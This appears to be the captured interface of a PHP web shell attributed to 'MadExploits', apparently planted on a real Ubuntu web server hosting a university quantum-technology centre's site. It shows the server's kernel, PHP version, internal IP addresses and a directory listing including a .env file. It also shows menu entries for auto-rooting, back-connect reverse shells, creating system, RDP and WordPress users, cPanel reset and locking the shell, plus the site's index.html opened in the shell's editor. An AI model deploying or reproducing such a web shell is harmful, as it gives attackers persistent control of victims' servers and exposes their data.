Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
server
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.env
41
B
-rw-r--r--
.env.example
285
B
-rw-r--r--
README.md
2.09
KB
-rw-r--r--
apache-config.conf
2.78
KB
-rw-r--r--
bun.lockb
196.41
KB
-rw-r--r--
components.json
414
B
-rw-r--r--
deploy.sh
4.87
KB
-rw-r--r--
eslint.config.js
765
B
-rw-r--r--
index.html
1.05
KB
-rw-r--r--
package-lock.json
236.95
KB
-rw-r--r--
package.json
2.69
KB
-rw-r--r--
postcss.config.js
81
B
-rw-r--r--
setup-server.sh
7.51
KB
-rw-r--r--
tailwind.config.ts
3.81
KB
-rw-r--r--
tsconfig.app.json
652
B
-rw-r--r--
tsconfig.json
369
B
-rw-r--r--
tsconfig.node.json
481
B
-rw-r--r--
utils.ts
169
B
-rw-r--r--
vite.config.ts
454
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Centre for Quantum Technology | IIIT Delhi</title> <meta name="description" content="Centre for Quantum Technology at IIIT Delhi - Pioneering research in quantum computing, quantum communication, and quantum sensing technologies." /> <meta name="author" content="Centre for Quantum Technology, IIIT Delhi" /> <meta name="keywords" content="quantum computing, quantum technology, quantum communication, quantum sensing, IIIT Delhi, quantum research, quantum education" /> <meta property="og:title" content="Centre for Quantum Technology | IIIT Delhi" /> <meta property="og:description" content="Pioneering research and education in quantum computing, quantum communication, and quantum sensing technologies at IIIT Delhi." /> <meta property="og:type" content="website" /> </head> <body> <div id="root"></div> <script type="module" src="/src/main.tsx"></script> </body> </html>
Close